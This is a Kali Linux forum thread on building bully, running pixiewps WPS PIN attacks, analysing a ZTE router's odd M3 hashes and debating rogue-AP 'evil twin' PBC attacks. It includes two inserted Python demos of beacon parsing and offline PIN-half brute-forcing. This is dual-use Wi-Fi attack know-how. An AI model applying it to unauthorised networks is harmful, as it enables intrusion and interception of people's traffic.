apt-get install libpcap-dev


Edit: @Quest was that quick enough for you?

Quest
2016-01-07, 16:55
5 mins... Not bad not bad.

**** ;)

kcdtv
2016-01-07, 17:14
Is there any benefit over reaver
Without any doubt, if you use a Ralink USB (RT3070, RT3072, RT3570, RT3572), as they work very badly with reaver.
For the rest of the chipsets it is more or less the same; try and you will see which you like more.

or more vulnerabilty to other routers??
Both use pixiewps and will exploit exactly the same vulnerabilities

slmafiq
2016-01-08, 10:49
soxrok2212 tnx for reply
but this is the result
ERROR
I use kali 2.

apt-get install libpcap-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
libpcap0.8-dev......

.................................................. ...........
cd bully/src
make
compilation terminated.
Makefile:19: recipe for target 'bully' failed
make: *** [bully] Error 1

Quest
2016-01-08, 11:20
download again > decompress in /root so you have a bully-master folder. Then


cd /root/bully-master/src
make
make install

slmafiq
2016-01-08, 13:29
download again > decompress in /root so you have a bully-master folder. Then


cd /root/bully-master/src
make
make install

I made it this way
wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
cd '/root/bully-master/src'
make
sudo make install
But have error

zimmaro
2016-01-08, 14:14
I made it this way
wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
cd '/root/bully-master/src'
make
sudo make install
But have error

what "type of error"??
post here!!
if this is "RELATED to dependencies" try first:

apt-get -y install build-essential libpcap-dev libssl-dev aircrack-ng pixiewps

after

cd '/root/bully-master/src'
make
sudo make install

slmafiq
2016-01-08, 15:51
Thanks zimmaro!
I installed bully successfully!

apt-get update
apt-get -y install build-essential
apt-get install libpcap-dev
apt-get install libssl-dev

kcdtv
2016-01-17, 19:07
Crazy thing...
I am testing a ZTE device (ZTE H218N) that is used by the ISP Jazztel (Spain)
The device had PIN 12345670 enabled by default. A couple of years ago Jazztel made an update to "disable" WPS
My guess is that they "unconfigured" the PIN or voluntarily broke the protocol at some point.
The router appears in wash....
Most of the time I get a continuous fail with our tools...
http://pix.toile-libre.org/upload/original/1453056425.png
But at some point... I get an M1, send an M2, receive an M3 and pixiewps is launched
Look at that:

http://pix.toile-libre.org/upload/original/1453056931.png
Incredible....
The PKE is exactly the same as for the Realtek devices that are supported by pixiewps
and
E-HASH1 = E-HASH2

Seeing this PKE again is pure madness
This PKE repeated all the time was the starting point of the discovery of the breach for Realtek....
And we see it again on a Broadcom chipset ...

And what about this inconceivable same value for Ehash1 and Ehash2?
It would mean that ES1 = ES2 and PSK1=PSK2....
ES1 and ES2 are not equal to 0 like for the Ralink, otherwise I would have got the results.
PSK1=PSK2 would be only possible if the PIN is 00000000
I tried to launch with 0000000 and didn't get anything.

It is also strange to be able to send an M2 sometimes, and that may be something to dig into for other purposes (check https://forums.kali.org/showthread.php?25459-Force-an-AP-to-reboot&highlight=reboot+ap)

This unsupported Broadcom device with PIN mode broken has a very strange behavior....

the chipset is, according to the wikidevi:

SoC               RAM    Flash  Network  USB          Serial  JTAG
Broadcom BCM5357  64MiB  16MiB  5 GbE    Yes 2x v2.0  ?       ?

soxrok2212
2016-01-17, 21:04
If you supply PIN 12345670 does it still recover the PSK? I think we briefly discussed this a LOOOOOONG time ago in a chat... The only reason I can think of off the top of my head is that the PIN is not configured and the router is just sending random data... but then again the static PKe is too... provoking to ignore. Do you have any more ZTE H218N's you can test this on?

UPDATE: I wonder if the network is using another device as the enrollee. Perhaps something like this is going on? Or try deauthing all the clients and see if you get the same result.

wiire
2016-01-17, 22:59
The new pixiewps, when modes are not specified, uses the Pke to try to determine the target. This means it's trying only for Realtek. You should try manually specifying all the modes --mode 1,2,3,4,5.

Also in case of Ralink devices with push button active, the 2 hashes are identical because of pin and secret hashes equal to 0.

In the beacon frame there could be the chipset vendor. It's under 'Tag vendor specific'.

UPDATE: seems aanarchyy's Bully doesn't run with --force. The nonce generated seems to be compatible with a Realtek device. I recommend again to test it manually and check in the beacon frame if the vendor information is present.

kcdtv
2016-01-18, 21:57
Hi soxrok2212, Hi wiire :D

first of all it seems that the "wikidevi" is wrong, or there may be several versions of the device... The point is that the chipset appears to be a Realtek one instead of a BCM:
http://pix.toile-libre.org/upload/original/1453147002.png
thanks for the trick wiire: I always looked in the WPS tags and didn't notice that information could be gathered there.
That would explain the presence of our "provocative PKE" in the M' messages.
It doesn't explain why pixiewps didn't launch a long bruteforce (I tried with --force or mode 3 --force / and I tried every mode separately)
This case is definitely less weird/interesting than what I thought first, as I thought it was a Broadcom device.
I managed to repeat this "fake" pixie dust once and I got the Realtek PKE (as expected) and two identical ehashes again (like the first time; not the same ehash as the first time, but the same ehash1 and ehash2).
I get a strange error if I put the stdout here (with or without code-quote)... If somebody wants it, ask me by PM and I will PM it to you. (or you can get it from here: https://www.wifi-libre.com/topic-335-extrano-ataque-pixeidust-contra-zte-h218n-sin-wps-habilitado.html#p1776)

If you supply PIN 12345670 does it still recover the PSK?
Never ever since the firmware update (around 2014)
Just from time to time you would get enough for a pixiedust... nothing else (never get an M5 or more)

discussed this a LOOOOOONG time ago in a chat... The only reason I can think of off the top of my head is that the PIN is not configured and the router is just sending random data
Yes indeed.
Seeing this Realtek PKE in what was supposed to be a Broadcom router, I got excited and thought that this data might lead to discovering another weakness in some unsupported Broadcom.
But this ZTE router definitely has a Realtek chipset...
Thanks for your "lights" about this.
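wiire's tip above (look in the beacon's vendor-specific tag for the chipset vendor) and the "Locked"/"PBC" state that wash prints both come from the tagged parameters of the beacon frame, so it is worth seeing how they are laid out. The parser below is an added example for this thread, not code from reaver, bully or pixiewps: it walks the 802.11 information elements of a beacon body, lists every vendor-specific OUI, and decodes the WPS element (Wi-Fi Alliance OUI 00:50:f2, type 0x04) into its named attributes. The beacon bytes at the bottom are constructed for the demonstration; the only real-world value in them is Realtek's IEEE-registered OUI 00:e0:4c, which stands in for the kind of tag kcdtv found.

```python
import struct

SSID = 0x00
VENDOR_SPECIFIC = 0xDD             # 802.11 element ID for vendor-specific tags
WPS_OUI = bytes.fromhex("0050f2")  # Wi-Fi Alliance OUI; OUI type 0x04 marks the WPS element
WPS_TYPE = 0x04

# WSC attribute IDs from the Wi-Fi Simple Configuration specification
WPS_ATTRS = {
    0x104A: "version",
    0x1044: "wps_state",           # 1 = not configured, 2 = configured
    0x1057: "ap_setup_locked",     # the flag wash reports as "Locked"
    0x1041: "selected_registrar",
    0x1012: "device_password_id",  # 0x0004 = PushButton (PBC)
    0x1021: "manufacturer",
    0x1023: "model_name",
    0x1011: "device_name",
}
TEXT_ATTRS = {0x1021, 0x1023, 0x1011}


def parse_ies(body: bytes):
    """Yield (element_id, data) for every tagged parameter in a beacon frame body.
    The first 12 bytes are fixed fields: timestamp(8), beacon interval(2), capability(2)."""
    pos = 12
    while pos + 2 <= len(body):
        eid, elen = body[pos], body[pos + 1]
        data = body[pos + 2:pos + 2 + elen]
        if len(data) != elen:
            raise ValueError("truncated information element")
        yield eid, data
        pos += 2 + elen


def parse_wps_ie(data: bytes) -> dict:
    """Decode the big-endian type/length/value attributes inside a WPS element."""
    attrs = {}
    pos = 0
    while pos + 4 <= len(data):
        atype, alen = struct.unpack(">HH", data[pos:pos + 4])
        value = data[pos + 4:pos + 4 + alen]
        if len(value) != alen:
            raise ValueError("truncated WPS attribute")
        name = WPS_ATTRS.get(atype, f"attr_{atype:04x}")
        if atype in TEXT_ATTRS:
            attrs[name] = value.decode("utf-8", "replace")
        elif alen in (1, 2):
            attrs[name] = int.from_bytes(value, "big")
        else:
            attrs[name] = value.hex()
        pos += 4 + alen
    return attrs


def summarize_beacon(body: bytes) -> dict:
    """Collect the SSID, every vendor-specific OUI, and the decoded WPS element."""
    info = {"ssid": None, "vendor_ouis": [], "wps": None}
    for eid, data in parse_ies(body):
        if eid == SSID:
            info["ssid"] = data.decode("utf-8", "replace")
        elif eid == VENDOR_SPECIFIC and len(data) >= 4:
            oui = data[:3]
            info["vendor_ouis"].append(oui.hex(":"))
            if oui == WPS_OUI and data[3] == WPS_TYPE:
                info["wps"] = parse_wps_ie(data[4:])
    return info


def _ie(eid: int, data: bytes) -> bytes:
    return bytes([eid, len(data)]) + data


def _tlv(atype: int, value: bytes) -> bytes:
    return struct.pack(">HH", atype, len(value)) + value


# Constructed beacon body (not a real capture): fixed fields, SSID, a chipset vendor
# tag using Realtek's registered OUI 00:e0:4c with made-up payload, then a WPS element.
SAMPLE_BEACON = (
    bytes(8) + struct.pack("<HH", 100, 0x0411)
    + _ie(SSID, b"demo-ap")
    + _ie(VENDOR_SPECIFIC, bytes.fromhex("00e04c") + bytes([0x02, 0x01, 0x02]))
    + _ie(VENDOR_SPECIFIC, WPS_OUI + bytes([WPS_TYPE])
          + _tlv(0x104A, b"\x10")        # version 1.0
          + _tlv(0x1044, b"\x02")        # configured
          + _tlv(0x1057, b"\x00")        # AP setup not locked
          + _tlv(0x1041, b"\x01")        # selected registrar active
          + _tlv(0x1012, b"\x00\x04")    # device password id: PushButton
          + _tlv(0x1021, b"DemoVendor"))
)

if __name__ == "__main__":
    print(summarize_beacon(SAMPLE_BEACON))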

wiire
2016-01-18, 23:07
That's what I suspected. It's Realtek without a doubt.

What do you mean pixiewps didn't launch the full bruteforce? I'm pretty confident it found the seed but couldn't recover the pin if it stopped right away.

Try compiling with 'make debug' and see if at some point it says 'Seed found' or something similar.

The two hashes should be identical only in case of the PBC pin as you pointed out (in case es1 and es2 are the same as well).

When testing the program I did test it against PBC so I'm sure it works properly.

kcdtv
2016-01-19, 14:32
that's what i get in stdout with adding --force -v 3


Pixiewps 1.2

[-] WPS pin not found!

Time taken: 1 s 908 ms


pixiewps seems to work properly as it is suggested to use "force" when i don't use it :

Pixiewps 1.2

[-] WPS pin not found!

Time taken: 1 s 903 ms

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

It doesn't explicitly print to stdout that the seed is found, so I am gonna install in debug mode...
see you in 5 minutes...

... You are absolutely right
I didn't doubt it but I just wanted to see the debug mode in action... :D And I will leave it in debug mode, i prefer like this :D
- edit: well, I won't, because that would break the compatibility in automated pixie dust mode with reaver 1.5.2 or bully revisited by aanarchyy. I mention this in case people would compile in debug mode

http://pix.toile-libre.org/upload/original/1453213519.png

It is not as interesting as I thought first, but it is still useful to know: as every manufacturer does what they want with PROBES and there is no way to distinguish between routers with WPS PIN correctly enabled and the others... well, this seems to be the way!
If our ehash1 and ehash2 are equal in our M3 message it means that only PBC is fully enabled and that PIN mode will not lead to anything.
I don't have a Broadcom device or Atheros device to check it out, but at least that is the case for Realtek and Ralink.
That's pretty cool, we still learned something somehow ;)

aanarchyy
2016-01-19, 17:08
@kcdtv debug mode works just fine with bully, I had pixie with debug mode on for quite a while, just extra printing.

oh and I added --force to the pixiewps command, I wasn't aware that was still in as wiire had removed it from the
help.
also added the ESSID and BSSID to the final output per request of soxrok2212

wiire
2016-01-19, 20:50
If our ehash1 and ehash2 are equal in our M3 message it means that only PBC is fully enabled and that PIN mode will not lead to anything.

Just to clarify, the PBC method is - protocol-wise - identical to the PIN method. The only difference is the method of activation (a button) and that the PIN is already known, being '00000000'.

I successfully recovered the WPA of my router after pressing the button, using Reaver and Pixiewps some time ago.

If you want you can pass me the data and I can try to to experiment a bit. But maybe the two equal hashes are part of the 'patching work' of the devs. We know for sure Realtek devices are weird.
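soxrok2212's explanation earlier in the thread (chipsets that set the secret keys to 0 or make them predictable) and wiire's point just above (the two M3 hashes coincide under PBC, whose PIN is 00000000) can both be checked against the WSC hash construction itself. The following is an added example written for this thread, not code from pixiewps, reaver or bully. AuthKey, PKE and PKR are constructed stand-ins (in the real protocol AuthKey is derived from the Diffie-Hellman shared secret and PKE/PKR are the 1536-bit public keys); weak_rng is a label for the failure mode the thread discusses, an enrollee whose E-S1/E-S2 nonces are all zero.

```python
import hashlib
import hmac
import os

# Constructed values for the demonstration; none of them come from a real device.
AUTHKEY = hashlib.sha256(b"demo AuthKey, normally derived from the DH shared secret").digest()
PKE = hashlib.sha256(b"demo enrollee DH public key").digest() * 6   # 192 bytes, like a real PKE
PKR = hashlib.sha256(b"demo registrar DH public key").digest() * 6  # 192 bytes, like a real PKR


def psk_half(authkey: bytes, pin_half: str) -> bytes:
    """PSK1 / PSK2: the first 128 bits of HMAC-SHA256(AuthKey, ASCII half of the PIN)."""
    return hmac.new(authkey, pin_half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, e_s: bytes, pin_half: str, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1 / E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR), as sent in M3."""
    msg = e_s + psk_half(authkey, pin_half) + pke + pkr
    return hmac.new(authkey, msg, hashlib.sha256).digest()


def enrollee_m3(pin: str, weak_rng: bool) -> dict:
    """Build the two M3 hashes for an 8-digit PIN.
    weak_rng=True models a chipset that uses all-zero secret nonces E-S1 and E-S2."""
    e_s1 = bytes(16) if weak_rng else os.urandom(16)
    e_s2 = bytes(16) if weak_rng else os.urandom(16)
    return {
        "e_hash1": e_hash(AUTHKEY, e_s1, pin[:4], PKE, PKR),
        "e_hash2": e_hash(AUTHKEY, e_s2, pin[4:], PKE, PKR),
    }


def offline_first_half(e_hash1: bytes, e_s1_guess: bytes):
    """What anyone holding M3 can do once E-S1 is known: test every 4-digit first half
    against E-Hash1 (at most 10^4 HMACs). Returns the half, or None when E-S1 is wrong."""
    for i in range(10_000):
        half = f"{i:04d}"
        if hmac.compare_digest(e_hash(AUTHKEY, e_s1_guess, half, PKE, PKR), e_hash1):
            return half
    return None


def hashes_equal(m3: dict) -> bool:
    """E-Hash1 == E-Hash2 requires E-S1 == E-S2 and PSK1 == PSK2, i.e. identical PIN halves."""
    return hmac.compare_digest(m3["e_hash1"], m3["e_hash2"])


if __name__ == "__main__":
    weak = enrollee_m3("12345670", weak_rng=True)
    strong = enrollee_m3("12345670", weak_rng=False)
    print("zero nonces, first half recovered:", offline_first_half(weak["e_hash1"], bytes(16)))
    print("random nonces, first half recovered:", offline_first_half(strong["e_hash1"], bytes(16)))
    print("PBC pin with zero nonces, hashes equal:", hashes_equal(enrollee_m3("00000000", True)))
```

With a 128-bit random E-S1 the HMAC input contains 2^128 unknown bits, so a candidate first half cannot be checked; with E-S1 fixed to zero the same check costs at most ten thousand HMACs, which is the entire gap the thread's tools rely on. The same construction shows why E-Hash1 and E-Hash2 coincide exactly when both secret nonces and both PIN halves are equal, as with PBC's 00000000 on a zero-nonce enrollee, and why they differ for an ordinary PIN even on such a device.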

kcdtv
2016-01-21, 00:26
Just to clarify, the PBC method is - protocol-wise - identical to the PIN method. The only difference is the method of activation (a button) and that the PIN is already known, being '00000000'.

ok :)

If you want you can pass me the data and I can try to to experiment a bit. But maybe the two equal hashes are part of the 'patching work' of the devs. We know for sure Realtek devices are weird.
And it is a .... ZTE ... low cost and low security.... with above all a touch from Jazztel, for whom it took more than one year to understand that all their devices had PIN 12345670 enabled.
So weirdness is expected...
here is the data: http://www78.zippyshare.com/v/y3wuTRzz/file.html
if you need something more, just ask

also added the ESSID and BSSID to the final output per request of soxrok2212
The same guy that requested a tool for pixiedust one day ... I think I remember now... be careful with him, you never know where it can stop! :D

soxrok2212
2016-01-24, 17:21
Glad to see it's all sorted out! :)

eddie
2016-02-01, 09:25
hi to all
I'm studying on WiFi vulnerabilities and specially on WPS. I found this ("") article on the web

Can it be a new attack or not?! it claims that:


even by completely disabling the WPS on the routers, all vulnerabilities are not covered

Laserman75
2016-02-01, 14:25
hi to all
I'm studying on WiFi vulnerabilities and specially on WPS. I found this (www.acsij.org/acsij/article/viewFile/67/63) article on the web

Can it be a new attack or not?! it claims that:

In the article, nothing is described new ;)

eddie
2016-02-01, 14:46
In the article, nothing is described new ;)

Really?? :D. So the name should be "repetitive attacks on WPS!!".....
I think the first scenario is not possible... But about the second, are there any tools for performing that scenario in Kali?

Where can I find documents for the original source of these attacks??

soxrok2212
2016-02-01, 23:41
"But if the attacker could somehow change his role in this exchange and could be the enrollee, he can use two arbitrary values instead of E-Hash1 and E- Hash2 and sends it as M3 message."

First off, the author doesn't sound very informed on the topic in general. A little "somehow" magic and it should work, right? Unfortunately, that's not how the protocol works. Reminds me of the "Blackjack Attack" that was quickly deemed unsuccessful, http://méric.fr/blog/blackjack.html though they are using a rogue AP. I don't think it is possible.

As for the second attack, well, I don't really understand what they are trying to say. It is written in pretty poor English, though I can't point them out on this because it's just a language barrier.

The author should have done practical analysis of the suggested ideas instead of documenting theoretical analysis. It would've made a much more interesting document if they had found proof for any of the suggested ideas.

wiire
2016-02-02, 07:40
The fake AP attack to get the first half of the pin is nothing new. The procedure is described in the specification (2.02) as well in Bogard's slides. The problem with it is that usually one is never prompted to insert a WPS pin when trying to connect to a WPS AP.

The "second attack" is more interesting. Instead of setting up a fake AP with the PIN method, set up one with the PBC method (same name, same encryption) with a greater power level in an attempt to cover the legitimate AP and disconnect the client (same procedure as an evil twin). Then when the user tries to connect, make the fake AP start a PBC session. The Windows victim computer should automatically start a PBC WPS session, grab the new configuration and eventually automatically connect to the fake AP.

Now the attacker could potentially set up dns spoofing, sslstrip, redirection etc.

I honestly never tried, but this would be a flaw in Windows security rather than WPS.

eddie
2016-02-02, 10:37
@soxrok2212

thanks. I read that hypothetical "Blackjack" attack, but it's different. I think theoretically the first attack has no problem, but as @wiire said, practically it's not possible.

@wiire

thanks. Really helped me. I want to implement second attack to try it. Do you think this is worth trying?

carshiv
2016-02-02, 11:10
I tried cracking a D-Link router's pin with the --force option but the pin was not found. Does that mean the router is invulnerable? (Pixie version 1.2, kali 2.0)

kcdtv
2016-02-02, 13:36
About this second "PBC" attack (4.2) "evil twin"
It is one of the "PBC Rogue attacks" described by koala some time ago and it doesn't work as "smoothly" as they claim.
Because Windows offers the possibility of a PBC connection only the first time you connect to an AP, just when you create a new profile.
So you have to create a fake AP where the ESSID is slightly changed, otherwise Windows will never activate the PBC connection: it has to be a new profile.
Then it works: as it is a different-name AP, Windows proposes that you press the PBC button on the router side and you could get the client connected to your fake AP.
That's how it would look from the victim side:
http://zupimages.net/up/14/14/dv0h.bmp
As you can see, the legitimate profile Livebox-XXXX appears with a red cross (effects of mdk3 + airbase used for deauth :p) and the fake network reachable is livebox-XXXX (lower case instead of upper)
If the victim clicks on "livebox (fake)" then it would be connected
http://zupimages.net/up/14/15/bf33.png
So it is not as simple and straight as they described, and it depends on the user's active intervention to fall into the trap.
Complete and documented tutorial here : [Tuto] Rogue AP discrète en full WPA avec hostapd (http://www.crack-wifi.com/forum/topic-10455-tuto-rogue-ap-discrete-en-full-wpa-avec-hostapd.html)
It is in French, sorry, but you have snapshots with Kali Linux every two lines and code blocks, so you will be able to follow the story.

eddie
2016-02-02, 14:30
Because Windows offers the possibility of a PBC connection only the first time you connect to an AP, just when you create a new profile.

I don't agree! I think whenever PBC support is announced in beacons, Windows offers the possibility of a PBC connection. I tried it at home with my router.
Also there is no need to create a fake AP with a slightly changed ESSID; it's possible to have two access points (or more, maybe!) with the same ESSID and the same encryption.

soxrok2212
2016-02-02, 15:18
Also, in the event of using a Rogue AP, the best option would just be to redirect to a fake page requesting the WPA key, not the WPS pin. Both of the author's ideas are pretty useless to me; if a router supports WPS then 99.99% of the time it is running WPA2-CCMP and it would just be easier to grab the PSK and then from there just grab the WPS pin from the router config.

eddie
2016-02-02, 18:32
I think the poor English in that article causes this misunderstanding. The goal in both ideas is not requesting the WPS pin instead of the WPA key! I think wiire is completely right.

kcdtv
2016-02-03, 17:16
I think whenever PBC support is announced in beacons, Windows offers the possibility of a PBC connection. I tried it at home with my router.
Maybe you use Windows 8.1? Anyway, I doubt that it changes anything.
Koala did his tests with Windows 7 and I did the test with Windows 10.
A PBC connection is just proposed the first time you connect to the network.
Once you have a profile created, Windows just tries the PMK and will not propose PBC again.
Even if you push the button on the router side...
I connected through PBC to a router that I use for the test; once I was successfully connected I changed the WPA passphrase (simulating a fake AP with the same BSSID and ESSID) and tried to connect to my AP again.
The Windows network manager stops trying after a certain time and that's it.
That's all you get... No PBC is proposed (as the profile is already created).

I think wiire is completely right.
No one said he is not :D
Both ideas are not new... the authors of the paper present them as new vulnerabilities and it has been demonstrated that this is not the case.

eddie
2016-02-03, 19:51
Maybe you use Windows 8.1? Anyway, I doubt that it changes anything.
Koala did his tests with Windows 7 and I did the test with Windows 10.
A PBC connection is just proposed the first time you connect to the network.
Once you have a profile created, Windows just tries the PMK and will not propose PBC again.
Even if you push the button on the router side...
I connected through PBC to a router that I use for the test; once I was successfully connected I changed the WPA passphrase (simulating a fake AP with the same BSSID and ESSID) and tried to connect to my AP again.
The Windows network manager stops trying after a certain time and that's it.
That's all you get... No PBC is proposed (as the profile is already created).

I found my mistake! You are completely right as well :D

Both ideas are not new... the authors of the paper present them as new vulnerabilities and it has been demonstrated that this is not the case.

Exactly! So is there any tool to test this attack using Kali or another Linux OS?

I have another question: how can I get a router's firmware source code?

soxrok2212
2016-02-03, 23:31
Exactly! So is there any tool to test this attack using Kali or another Linux OS?

Either way, both are not vulnerabilities in WPS; I would just consider it a workaround. No, there are no designated tools for this, though I'm assuming hostapd and some magic could make it work.



I have another question: how can I get a router's firmware source code?

Either Google the model number followed by "source code", or you could try extracting the compiled firmware with binwalk and looking at the binaries.